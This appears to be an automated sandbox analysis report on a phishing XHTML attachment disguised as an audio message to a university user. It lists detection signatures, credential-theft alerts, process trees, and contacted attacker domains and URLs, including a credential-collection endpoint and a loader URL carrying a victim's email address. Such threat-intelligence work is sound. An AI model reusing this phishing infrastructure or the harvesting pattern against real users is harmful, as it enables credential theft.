Edit tour

Windows Analysis Report
#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml

Overview

General Information

Sample name:	#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml renamed because original name is a hash value
Original sample name:	Audio_Msg Umanitoba.xhtml
Analysis ID:	1647448
MD5:	795e2df43fc14a36ab6394e900f044eb
SHA1:	272b43f3317c2c3fc6355462a9d0e506577f6c0f
SHA256:	d7381bc5ae851624b52c34a4a4d83a8b5c35a51ca203f4758463506807550007
Infos:

Detection

HTMLPhisher

Score:	76
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Suricata IDS alerts for network traffic

Yara detected HtmlPhish10

HTML IFrame injector detected

HTML Script injector detected

Suspicious Javascript code found in HTML file

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

HTML body contains low number of good links

HTML body contains password input but no form action

IP address seen in connection with other malware

Invalid 'forgot password' link found

No HTML title found

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 7124 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 1488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2264,i,17322950773745086463,4960507594035301740,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2296 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7760 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2264,i,17322950773745086463,4960507594035301740,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5112 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7952 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.7.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.3.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.5.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Suricata Signatures

ETPRO PHISHING Successful Generic Phish 2021-03-25

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-24T21:30:15.915969+0100	2847819	1	Successful Credential Theft Detected	192.168.2.5	49754	104.168.138.190	443	TCP
2025-03-24T21:30:38.046572+0100	2847819	1	Successful Credential Theft Detected	192.168.2.5	49761	104.168.138.190	443	TCP
2025-03-24T21:30:52.005983+0100	2847819	1	Successful Credential Theft Detected	192.168.2.5	49773	104.168.138.190	443	TCP
2025-03-24T21:31:06.627986+0100	2847819	1	Successful Credential Theft Detected	192.168.2.5	49779	104.168.138.190	443	TCP
2025-03-24T21:31:18.570042+0100	2847819	1	Successful Credential Theft Detected	192.168.2.5	49784	104.168.138.190	443	TCP
2025-03-24T21:32:09.037829+0100	2847819	1	Successful Credential Theft Detected	192.168.2.5	49790	104.168.138.190	443	TCP
2025-03-24T21:32:17.781701+0100	2847819	1	Successful Credential Theft Detected	192.168.2.5	49795	104.168.138.190	443	TCP

HTTP traffic detected: POST /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveContent-Length: 49sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: chromecache_115.5.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: chromecache_117.5.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_117.5.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.5:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.5:49758 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir7124_1283082205

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir7124_1283082205

Jump to behavior

Source: classification engine

Classification label: mal76.phis.winXHTML@24/23@30/16

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2264,i,17322950773745086463,4960507594035301740,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2296 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2264,i,17322950773745086463,4960507594035301740,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5112 /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2264,i,17322950773745086463,4960507594035301740,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2296 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2264,i,17322950773745086463,4960507594035301740,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5112 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=krista.wiebe@umanitoba.ca	0%	Avira URL Cloud	safe
https://avcbtech.site/kuk/xwps.php	0%	Avira URL Cloud	safe
https://sender.linxcoded.top/start/xls/includes/css6.css	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0012.t-0009.t-msedge.net	13.107.246.40	true	false	high
office.avcbtech.store	139.28.36.38	true	false	high
code.jquery.com	151.101.66.137	true	false	high
s-part-0044.t-0009.t-msedge.net	13.107.246.72	true	false	high
avcbtech.site	104.168.138.190	true	false	high
server1.linxcoded.top	185.174.100.76	true	false	high
www.google.com	142.251.40.132	true	false	high
api.ipify.org	104.26.13.205	true	false	high
sender.linxcoded.top	185.174.100.20	true	false	high
ipv4.imgur.map.fastly.net	199.232.196.193	true	false	high
i.imgur.com	unknown	unknown	false	high
_8248._https.server1.linxcoded.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://i.imgur.com/0HdPsKK.png	false		high
https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=krista.wiebe@umanitoba.ca	true	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	true	Avira URL Cloud: safe	unknown
https://avcbtech.site/kuk/xwps.php	true	Avira URL Cloud: safe	unknown
https://sender.linxcoded.top/start/xls/includes/css6.css	false	Avira URL Cloud: safe	unknown
https://i.imgur.com/KAb5SEy.png	false		high
https://code.jquery.com/jquery-3.1.1.min.js	false		high
https://api.ipify.org/?format=json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_117.5.dr	false		high
https://getbootstrap.com)	chromecache_117.5.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.174.100.20	sender.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
199.232.196.193	ipv4.imgur.map.fastly.net	United States	54113	FASTLYUS	false
142.251.40.132	www.google.com	United States	15169	GOOGLEUS	false
151.101.66.137	code.jquery.com	United States	54113	FASTLYUS	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
104.26.12.205	unknown	United States	13335	CLOUDFLARENETUS	false
199.232.192.193	unknown	United States	54113	FASTLYUS	false
139.28.36.38	office.avcbtech.store	Ukraine	42331	FREEHOSTUA	false
142.250.81.228	unknown	United States	15169	GOOGLEUS	false
185.174.100.76	server1.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
104.168.138.190	avcbtech.site	United States	54290	HOSTWINDSUS	false
172.67.74.152	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.7
192.168.2.16
192.168.2.6
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1647448
Start date and time:	2025-03-24 21:28:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml renamed because original name is a hash value
Original Sample Name:	Audio_Msg Umanitoba.xhtml
Detection:	MAL
Classification:	mal76.phis.winXHTML@24/23@30/16
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .xhtml

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, sppsvc.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.31.69.3, 142.251.32.110, 142.251.41.3, 142.251.40.110, 142.251.16.84, 142.250.80.78, 142.250.65.174, 142.250.80.46, 142.251.41.14, 142.251.40.138, 142.251.40.238, 142.250.65.238, 142.250.65.206, 199.232.210.172, 142.250.80.35, 142.251.40.206, 142.250.176.206, 13.107.246.40, 13.107.246.72, 52.149.20.212, 23.96.180.189, 150.171.27.10, 23.33.40.153
Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, g.bing.com, aadcdn.msauth.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, arc.msn.com, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, prod.fs.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.174.100.20	Play_VM-Now(apply)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	auuu.xhtml	Get hash	malicious	HTMLPhisher	Browse
	ATT11027.xhtml	Get hash	malicious	HTMLPhisher	Browse
	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse
	https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Get hash	malicious	HtmlDropper	Browse
	ATT-897850.htm	Get hash	malicious	HtmlDropper	Browse
	+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg	Get hash	malicious	HtmlDropper	Browse
	Play-Audio_Vmail_Ach Statement Credi....html	Get hash	malicious	HtmlDropper	Browse
151.101.66.137	http://facebooksecurity.blogspot.co.uk/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://novo.oratoriomariano.com/novo/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	http://facebooksecurity.blogspot.ch/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://site9615380.92.webydo.com/?v=1	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.2.min.js
	http://grandprairie-water-damage-restoration.com	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	2023121142000021ki01kvjs.html	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-latest.min.js
104.26.13.205	VRChat_ERP_Setup 1.0.0.msi	Get hash	malicious	Unknown	Browse	api.ipify.org/
	ArenaWarsSetup.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Fordham.bat	Get hash	malicious	Unknown	Browse	api.ipify.org/
	nn1jUU3YSs.msi	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Software Installer.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=xml
	Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=xml
	get_txt.ps1	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	XkgoE6Yb52.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	R1TftmQpuQ.bat	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
199.232.196.193	setup.exe	Get hash	malicious	Xmrig	Browse	i.imgur.com/FzGMM7P.jpg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0044.t-0009.t-msedge.net	Acgsys#receipt0191.html	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	13.107.246.72
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	13.107.246.72
	PRE#U00c7O - RFQ 674441-76450.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.72
	https://pkns.sidhtech.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPWRIQnlhM2M9JnVpZD1VU0VSMTUwMzIwMjVVMjIwMzE1Mjk=	Get hash	malicious	Unknown	Browse	13.107.246.72
	https://waimao-north-star-mail.qiye.163.com/api/j/html?c=https%3A%2F%2F1drv.ms%2Fo%2Fs!AjlMaeoI5pi7f_GXm50IY_RD-sw%3Fe%3DEsmwj4%3Fcid%3Dsite_nqmm3LQS7c9jn-2FWvVcVpMl0NsyUA8yUApYElnaeUm2Ly_xlUzBpbEuL	Get hash	malicious	Unknown	Browse	13.107.246.72
	PC900-1new.exe	Get hash	malicious	XRed	Browse	13.107.246.72
	https://urlzs.com/KxwhQD	Get hash	malicious	HTMLPhisher	Browse	13.107.246.72
	https://urlzs.com/KxwhQD	Get hash	malicious	HTMLPhisher	Browse	13.107.246.72
	Microsoft Security Slate - March 20, 2025.pdf	Get hash	malicious	Unknown	Browse	13.107.246.72
	qNEBT6e.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.72
code.jquery.com	Acgsys#receipt0191.html	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.194.137
	0064_QB_Payment_Statemnt87T.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.130.137
	https://8tf7eelab.cc.rs6.net	Get hash	malicious	Unknown	Browse	151.101.130.137
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
